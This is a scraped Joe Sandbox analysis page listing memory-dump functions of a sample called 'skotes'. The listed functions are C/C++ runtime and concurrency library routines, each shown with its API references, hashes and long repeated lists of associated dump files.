Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2964418898-3242537097
Opcode ID: edac67b234da4db81de88dc73382602d3b4d4d883a45d3918a058520cdbc4706
Instruction ID: 291f9d9c6654cd0b31f341f44a6db1a943805084f9e4daf7205fa56b77eb90ee
Opcode Fuzzy Hash: edac67b234da4db81de88dc73382602d3b4d4d883a45d3918a058520cdbc4706
Instruction Fuzzy Hash: 1C0126A0783B22A9EE383B797C0DE5B12DC8F86B44F541121E940F7280DEEDCC114565

Function 007AE8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 007AE91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 007AE926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 007AE950
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 007AE959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 007AE9DC

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
String ID:
API String ID: 512098550-0
Opcode ID: e312e72a36c5cbb077dfb3a6e2e507bb6853612486d11454138c8d237347fc8b
Instruction ID: 94800c437ae10582ffc925c25216bdd7611d59c5fbadb842552253ccba5f73b1
Opcode Fuzzy Hash: e312e72a36c5cbb077dfb3a6e2e507bb6853612486d11454138c8d237347fc8b
Instruction Fuzzy Hash: 70414F75A01619EFCF09DF68C458A6DB7B6FF89310F048259E506A7390CB78BE01CB91

Function 007AD2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 007AD344
ListArray.LIBCONCRT ref: 007AD367
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 007AD370
ListArray.LIBCONCRT ref: 007AD3A8
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 007AD3B3

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
String ID:
API String ID: 4212520697-0
Opcode ID: 3b255fc7959bbe9b53a130020004c51fbf562f927d3e565af6ac185beb80d971
Instruction ID: 2dad6872f077dde395a963ec09bb0b27079cd4e2a2c77429c05b5b3e936a2eca
Opcode Fuzzy Hash: 3b255fc7959bbe9b53a130020004c51fbf562f927d3e565af6ac185beb80d971
Instruction Fuzzy Hash: 5831A135700210EFCB15DF54C888BADB7B6BFCA700F054299E8069B392DB78AD41CB92

Function 007A86C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 007A86EE

Part of subcall function 0079EAD0: _SpinWait.LIBCONCRT ref: 0079EAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 007A8702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 007A8734
List.LIBCMT ref: 007A87B7
List.LIBCMT ref: 007A87C6

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 5aff07e516b13610491ff6c44116c966f1a8b0392d79c0e05ad8c1c88347c508
Instruction ID: 3df44d37ead1bdf2baa7359c4928e4a6b84ebb7a3c1fd3041028cd3d8f811ff1
Opcode Fuzzy Hash: 5aff07e516b13610491ff6c44116c966f1a8b0392d79c0e05ad8c1c88347c508
Instruction Fuzzy Hash: 1B31A932D01255DFCF54EFA4D5856ECBBB1BF86308F28026AD4027B252DB39AD04CB96

Function 007C1ABC Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279COMMONLIBRARYCODE

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 007C1BD7
__dosmaperr.LIBCMT ref: 007C1BF6
__dosmaperr.LIBCMT ref: 007C1D9C

Strings

H, xrefs: 007C1D21

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: __dosmaperr
String ID: H
API String ID: 2332233096-2852464175
Opcode ID: a08afef387794836ebaf6889ff82e49b53edecc035e46f279e0fbeaeb6935998
Instruction ID: 30c6b465febc89af56ed583a91d1900861f783ed1fd8858cefdc96ccab0b2f62
Opcode Fuzzy Hash: a08afef387794836ebaf6889ff82e49b53edecc035e46f279e0fbeaeb6935998
Instruction Fuzzy Hash: 9AA10632A041548FCF29DF68C895FAD3BA19F47320F1441ADE812AF392DB399D12CB61

Function 0079A840 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0079A9D0
__Mtx_unlock.LIBCPMT ref: 0079A9ED

Part of subcall function 00783380: __Cnd_broadcast.LIBCPMT ref: 007833CB
Part of subcall function 00783380: __Mtx_unlock.LIBCPMT ref: 007833DF

Concurrency::cancel_current_task.LIBCPMT ref: 0079AA45

Strings

=L-t, xrefs: 0079A857

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
String ID: =L-t
API String ID: 3354401312-768041998
Opcode ID: b26c64d66e6df04d09cac2fe462f0177e236f56c025732a3dd14db8162edebd0
Instruction ID: 39afe1ac8e468d5399748245fce1a8749a60191a26e7a14113e096f4ada8a419
Opcode Fuzzy Hash: b26c64d66e6df04d09cac2fe462f0177e236f56c025732a3dd14db8162edebd0
Instruction Fuzzy Hash: B3618DB0D02209DFDF14DFA4D548BAEBBB8FF04314F148169E805A7381DB39AA04CBA1

Function 0079C452 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0079C4F8
__Xtime_diff_to_millis2.LIBCPMT ref: 0079C542
_xtime_get.LIBCPMT ref: 0079C561

Strings

=L-t, xrefs: 0079C458

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
